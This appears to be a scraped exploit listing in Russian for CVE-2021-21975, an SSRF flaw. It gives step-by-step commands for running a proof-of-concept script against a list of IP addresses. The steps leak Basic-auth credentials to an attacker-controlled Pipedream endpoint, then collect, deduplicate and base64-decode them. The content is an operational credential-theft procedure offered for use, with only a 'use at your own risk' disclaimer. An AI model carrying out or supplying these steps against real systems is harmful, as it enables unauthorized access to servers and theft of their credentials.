## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DORKERDEVIL-CVE-2021-21975
# CVE-2021-21975
#SSRF-POC - ssrf к утечке учетных данных
#Сначала настройте pd client.
#Теперь запустите ./pd deploy http-new-requests
#теперь замените http-запрос pipedream напр.: Randomstring.m.pipedream.net в скрипте
#запустите это в отдельном терминале - ./pd logs new-requests | tee -a req.txt
#и теперь запустите это в другом терминале - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"Это ранний proof of concept, созданный, когда уязвимость стала публичной несколько месяцев назад, так что используйте его на свой страх и риск." :V
#авторы @wabaf3t @D0rkerDevil